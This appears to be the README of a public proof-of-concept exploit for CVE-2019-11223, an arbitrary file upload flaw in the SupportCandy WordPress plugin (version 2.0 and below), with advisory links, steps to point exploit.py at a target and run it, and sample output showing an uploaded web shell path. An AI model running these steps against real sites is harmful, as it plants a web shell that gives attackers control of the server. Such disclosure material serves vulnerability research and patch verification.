Arbitrary File Upload in Wordpress Plugin SupportCandy Version 2.0 Below

• https://cert.kalasag.com.ph/news/research/vulnerable-wordpress-plugin-lets-you-take-over-websites/
• https://wordpress.org/plugins/supportcandy/#developers
• https://www.pluginvulnerabilities.com/2019/04/05/arbitrary-file-upload-vulnerability-in-supportcandy/

git clone https://github.com/AngelCtulhu/CVE-2019-11223.git

pip install requests

in exploit.py change localhost to your target

python exploit.py
"http:\/\/localhost\/wp-content\/uploads\/wpsc\/1555513124_shell.php"

• Christian Angel - KALASAG CERT

This project is licensed under the MIT License - see the LICENSE file for details